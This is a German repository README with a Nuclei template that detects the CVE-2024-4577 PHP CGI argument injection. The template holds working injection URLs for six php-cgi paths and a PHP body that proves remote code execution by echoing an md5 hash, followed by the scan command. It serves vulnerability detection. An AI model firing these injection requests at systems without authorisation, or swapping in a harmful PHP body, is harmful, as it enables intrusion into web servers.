
Nuclei-Vorlage zur Erkennung der CVE-2024-4577 PHP CGI-Argument-Injection-Schwachstelle, die automatisierte RCE-Tests durch manipulierte HTTP-Anfragen und Antwortabgleich ermöglicht.
Dieses Repository enthält eine Nuclei-Vorlage zur Erkennung der PHP CGI Argument Injection-Schwachstelle, die als CVE-2024-4577 identifiziert wurde.
id: CVE-2024-4577
info:
name: CVE-2024-4577 PHP CGI Argument Injection
author: Hüseyin TINTAŞ
severity: critical
description: >
CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
tags: cve,cve2024,php,cgi,rce,cve2024-4577
http:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
headers:
User-Agent: "curl/8.3.0"
Accept: "*/*"
Content-Type: "application/x-www-form-urlencoded"
Connection: "keep-alive"
body: |
<?php echo md5("CVE_2024_4577_TEST"); ?>
matchers:
- type: word
part: body
words:
- "83946a388fdf6cd2707eed8550575a76"
Um diese Vorlage mit Nuclei zu verwenden, speichern Sie den Vorlageninhalt in einer Datei mit dem Namen CVE-2024-4577.yaml und führen Sie den folgenden Befehl aus:
nuclei -t CVE-2024-4577.yaml -u <target-url>
Ersetzen Sie <target-url> durch die URL des Ziels, das Sie scannen möchten.
Bei Fragen oder für weitere Informationen können Sie mich über folgende Wege erreichen: